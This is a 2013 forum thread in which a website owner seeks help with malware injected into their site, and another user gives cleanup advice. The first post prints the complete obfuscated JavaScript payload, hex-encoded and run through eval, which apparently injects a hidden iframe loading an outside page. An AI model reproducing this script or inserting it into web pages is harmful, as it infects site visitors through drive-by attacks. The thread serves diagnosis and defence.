Daxidov Posted April 16, 2013 Share Posted April 16, 2013 Hello, I have virus like that on my website. Can someone help me sort it out as he's comming back. <!--a59dc4--><script type="text/javascript" language="javascript" > aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,6f,62,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,6f,62,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,5c,64,6d,70,25,68,6a,67,68,5d,6a,6c,61,5d,6b,26,5c,5d,27,5b,66,6c,26,68,60,68,1f,33,5,2,18,18,18,18,6f,62,26,6b,6c,71,64,5d,26,68,67,6b,61,6c,61,67,66,18,35,18,1f,59,5a,6b,67,64,6d,6c,5d,1f,33,5,2,18,18,18,18,6f,62,26,6b,6c,71,64,5d,26,5a,67,6a,5c,5d,6a,18,35,18,1f,28,1f,33,5,2,18,18,18,18,6f,62,26,6b,6c,71,64,5d,26,60,5d,61,5f,60,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,6f,62,26,6b,6c,71,64,5d,26,6f,61,5c,6c,60,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,6f,62,26,6b,6c,71,64,5d,26,64,5d,5e,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,6f,62,26,6b,6c,71,64,5d,26,6c,67,68,18,35,18,1f,29,68,70,1f,33,5,2,5,2,18,18,18,18,61,5e,18,20,19,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,6f,62,1f,21,21,18,73,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,6f,6a,61,6c,5d,20,1f,34,5c,61,6e,18,61,5c,35,54,1f,6f,62,54,1f,36,34,27,5c,61,6e,36,1f,21,33,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,6f,62,1f,21,26,59,68,68,5d,66,5c,3b,60,61,64,5c,20,6f,62,21,33,5,2,18,18,18,18,75,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,4b,5d,6c,3b,67,67,63,61,5d,20,5b,67,67,63,61,5d,46,59,65,5d,24,5b,67,67,63,61,5d,4e,59,64,6d,5d,24,66,3c,59,71,6b,24,68,59,6c,60,21,18,73,5,2,18,6e,59,6a,18,6c,67,5c,59,71,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,6e,59,6a,18,5d,70,68,61,6a,5d,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,61,5e,18,20,66,3c,59,71,6b,35,35,66,6d,64,64,18,74,74,18,66,3c,59,71,6b,35,35,28,21,18,66,3c,59,71,6b,35,29,33,5,2,18,5d,70,68,61,6a,5d,26,6b,5d,6c,4c,61,65,5d,20,6c,67,5c,59,71,26,5f,5d,6c,4c,61,65,5d,20,21,18,23,18,2b,2e,28,28,28,28,28,22,2a,2c,22,66,3c,59,71,6b,21,33,5,2,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,18,35,18,5b,67,67,63,61,5d,46,59,65,5d,23,1a,35,1a,23,5d,6b,5b,59,68,5d,20,5b,67,67,63,61,5d,4e,59,64,6d,5d,21,5,2,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,23,18,1a,33,5d,70,68,61,6a,5d,6b,35,1a,18,23,18,5d,70,68,61,6a,5d,26,6c,67,3f,45,4c,4b,6c,6a,61,66,5f,20,21,18,23,18,20,20,68,59,6c,60,21,18,37,18,1a,33,18,68,59,6c,60,35,1a,18,23,18,68,59,6c,60,18,32,18,1a,1a,21,33,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,3f,5d,6c,3b,67,67,63,61,5d,20,18,66,59,65,5d,18,21,18,73,5,2,18,6e,59,6a,18,6b,6c,59,6a,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,66,59,65,5d,18,23,18,1a,35,1a,18,21,33,5,2,18,6e,59,6a,18,64,5d,66,18,35,18,6b,6c,59,6a,6c,18,23,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,23,18,29,33,5,2,18,61,5e,18,20,18,20,18,19,6b,6c,59,6a,6c,18,21,18,1e,1e,5,2,18,20,18,66,59,65,5d,18,19,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,28,24,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,21,18,21,18,21,5,2,18,73,5,2,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,75,5,2,18,61,5e,18,20,18,6b,6c,59,6a,6c,18,35,35,18,25,29,18,21,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,6e,59,6a,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,1a,33,1a,24,18,64,5d,66,18,21,33,5,2,18,61,5e,18,20,18,5d,66,5c,18,35,35,18,25,29,18,21,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,64,5d,66,5f,6c,60,33,5,2,18,6a,5d,6c,6d,6a,66,18,6d,66,5d,6b,5b,59,68,5d,20,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,64,5d,66,24,18,5d,66,5c,18,21,18,21,33,5,2,75,5,2,61,5e,18,20,66,59,6e,61,5f,59,6c,67,6a,26,5b,67,67,63,61,5d,3d,66,59,5a,64,5d,5c,21,5,2,73,5,2,61,5e,20,3f,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,21,35,35,2d,2d,21,73,75,5d,64,6b,5d,73,4b,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,24,18,1f,2d,2d,1f,24,18,1f,29,1f,24,18,1f,27,1f,21,33,5,2,5,2,72,72,72,5e,5e,5e,20,21,33,5,2,75,5,2,75"["split"](",");}w=f;s=[];if(window.document)for(i=2-2;-i+1364!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+8);}xz=e;if(window.document)xz(s)}</script><!--/a59dc4--> Link to comment Share on other sites More sharing options...
axelmdp Posted April 16, 2013 Share Posted April 16, 2013 Hello Daxidov. I think you should check mainly your modules and other folders in order to detect where the malicious code is. It could be in any php or tpl file, and it maybe would be hard to find it because it's likely that the text was not stored in the same way that you see (i.e., if you searched "a59dc4" and you found it inside a file, you'd be lucky. But it's likely that it would be put in other random way, in order to confuse (i.e. echo "a".'59'."d".'c'.'4'; ). Anyway, try to find it by the string a59dc4. Start with the simpler way first. So, I'd recommend you to make a copy of the whole site and configure it for running on your local environment. In this way you could check if the virus on your site code, or it could be something with your hosting server. And another additional test would be trying to access from another browsers and another machines, because it could be a virus on your local computer (but in this case, you would see the code in other different sites as well). I wish you luck, and I'm willing to help you, so any news please post it here on the public topic. Regards, Axel ------------------ Check this cool modules (must have) : LoginAsCustomer for PS1.5 Cart Details MultiTabsForProducts Link to comment Share on other sites More sharing options...
Daxidov Posted April 16, 2013 Author Share Posted April 16, 2013 Hi, I have deleted this code from all files. Ill attach xml file with list of all infected files. Problem is that I had removed it afternoon and I had it again few mins ago. Hopefully it was only in htaccess file so I had to remove it only from there. I know how to delete it but I dont know to avoid it. Its so annoying. Have you any idea to stop it? ResultsReport.xml Link to comment Share on other sites More sharing options...
axelmdp Posted April 17, 2013 Share Posted April 17, 2013 I see. It's strange. I noticed that you've done the remove procedure on your local desktop. Were the files downloaded from the site? Or they were infected on your computer. Since you said that you have had to remove it again, I suspect that there is a virus present on the host. If your files are in a host server, you should contact the service support in order to inform about this situation. If it is on your computer, it should be analyzed in order to remove for good the virus. Regards, Axel ------------------ Check this cool modules (must have) : LoginAsCustomer for PS1.5 Cart Details MultiTabsForProducts Link to comment Share on other sites More sharing options...
Daxidov Posted April 17, 2013 Author Share Posted April 17, 2013 I have downloaded infected files from my server to my local computer. Then I have cleaned them and uploaded them again on server. Link to comment Share on other sites More sharing options...
axelmdp Posted April 17, 2013 Share Posted April 17, 2013 Ok, I see. So, if I were you I would contact with the hosting support and I'd tell them about what has happened. Thanks! Axel ------------------ Check this cool modules (must have) : LoginAsCustomer for PS1.5 Cart Details MultiTabsForProducts Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now